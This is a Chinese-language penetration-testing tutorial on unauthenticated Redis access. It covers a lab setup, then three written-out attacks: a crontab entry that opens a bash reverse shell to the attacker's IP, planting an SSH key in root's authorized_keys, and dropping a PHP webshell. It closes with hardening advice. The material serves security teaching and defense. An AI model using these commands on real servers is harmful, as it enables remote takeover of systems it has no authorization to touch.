Redis未授权访问漏洞利用与防御详解<\/h1>

0x01 Redis简介与漏洞概述<\/h2>

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的Key-Value数据库，并提供多种语言的API。从2010年3月15日起由VMware主持开发，2013年5月开始由Pivotal赞助。<\/p>

漏洞本质<\/strong>：Redis因配置不当可以导致未授权访问。攻击者无需认证即可访问内部数据，可能导致：<\/p>

敏感信息泄露<\/li>
执行flushall清空所有数据<\/li>
通过EVAL执行lua代码<\/li>
通过数据备份功能往磁盘写入后门文件<\/li>
如果Redis以root身份运行，可以写入SSH公钥文件直接登录服务器<\/li> <\/ul>
0x02 本地漏洞环境搭建<\/h2>
靶机环境<\/h3>

操作系统：CentOS 6.5<\/li>
Redis版本：3.2.0<\/li> <\/ul>
安装步骤<\/h3>

下载并解压Redis：<\/li> <\/ol>
wget http:\/\/download.redis.io\/releases\/redis-3.2.0.tar.gz <\/span><\/span>tar xzf redis-3.2.0.tar.gz <\/span><\/span>cd redis-3.2.0 <\/span><\/span>make <\/span><\/span><\/code><\/pre> 修改配置文件允许远程访问：<\/li> <\/ol> vim redis.conf <\/span><\/span><\/code><\/pre>修改内容：<\/p> 注释掉bind 127.0.0.1<\/code>（前面加上#号）<\/li> 设置protected-mode no<\/code><\/li> <\/ul> 启动Redis服务：<\/li> <\/ol> .\/src\/redis-server redis.conf <\/span><\/span><\/code><\/pre>默认危险配置<\/strong>：<\/p> 使用6379端口<\/li> 无密码认证<\/li> 未授权访问<\/li> <\/ul> 0x03 攻击测试方法<\/h2> 基本Redis命令<\/h3> 连接Redis：<\/li> <\/ol> redis-cli -h 目标IP <\/span><\/span><\/code><\/pre> 常用命令：<\/li> <\/ol> info # 查看Redis版本和服务器信息 set x "test" # 设置键值 flushall # 清空所有数据（危险！） KEYS * # 查看所有键 CONFIG GET dir # 获取Redis目录 CONFIG GET dbfilename # 获取数据库文件名 <\/code><\/pre> 攻击方法一：计划任务反弹Shell<\/h3> 前提条件<\/strong>：Redis以root权限运行<\/p> 攻击机监听端口：<\/li> <\/ol> nc -lvnp 7999<\/span> <\/span><\/span><\/code><\/pre> 通过Redis写入计划任务：<\/li> <\/ol> set x "\n*bash -i >& \/dev\/tcp\/攻击机IP\/7999 0>&1\n" config set dir \/var\/spool\/cron\/ config set dbfilename root save <\/code><\/pre> 原理<\/strong>：利用crontab执行命令反弹shell到攻击机<\/p> 攻击方法二：SSH公钥登录<\/h3> 前提条件<\/strong>：<\/p> Redis服务使用ROOT账号启动<\/li> 服务器开放SSH服务且允许密钥登录<\/li> <\/ul> 本地生成SSH密钥对：<\/li> <\/ol> ssh-keygen -t rsa <\/span><\/span><\/code><\/pre> 通过Redis写入公钥：<\/li> <\/ol> config set dir \/root\/.ssh\/ config set dbfilename authorized_keys set x "\n\n\nssh-rsa 公钥内容\n\n\n" save <\/code><\/pre> 直接使用私钥登录SSH<\/li> <\/ol> 攻击方法三：写入Webshell<\/h3> 前提条件<\/strong>：<\/p> Redis权限不高但有web目录写权限<\/li> 服务器运行web服务<\/li> <\/ul> 写入webshell：<\/li> <\/ol> config set dir \/var\/www\/html\/ config set dbfilename shell.php set x "<?php phpinfo();?>" save <\/code><\/pre> 注意<\/strong>：web目录需根据实际情况调整<\/p> 0x04 安全防护措施<\/h2> 网络层防护<\/strong>：<\/p> 限制可连接Redis的IP（通过bind配置）<\/li> 设置防火墙规则<\/li> <\/ul> <\/li> 认证配置<\/strong>：<\/p> 启用密码认证（requirepass配置项）<\/li> 使用强密码<\/li> <\/ul> <\/li> 服务配置<\/strong>：<\/p> 修改默认端口（port配置项）<\/li> 以低权限用户运行Redis<\/li> 启用保护模式（protected-mode yes）<\/li> <\/ul> <\/li> 文件系统防护<\/strong>：<\/p> 限制Redis的数据目录权限<\/li> 禁用危险命令（通过rename-command配置）<\/li> <\/ul> <\/li> 监控与日志<\/strong>：<\/p> 启用Redis日志功能<\/li> 监控异常连接和操作<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> Redis未授权访问漏洞危害严重，可导致服务器完全沦陷。管理员应严格按照最小权限原则配置Redis服务，及时更新补丁，并实施多层防御措施。渗透测试人员在进行授权测试时，可利用这些技术评估系统安全性，但务必遵守法律法规。<\/p>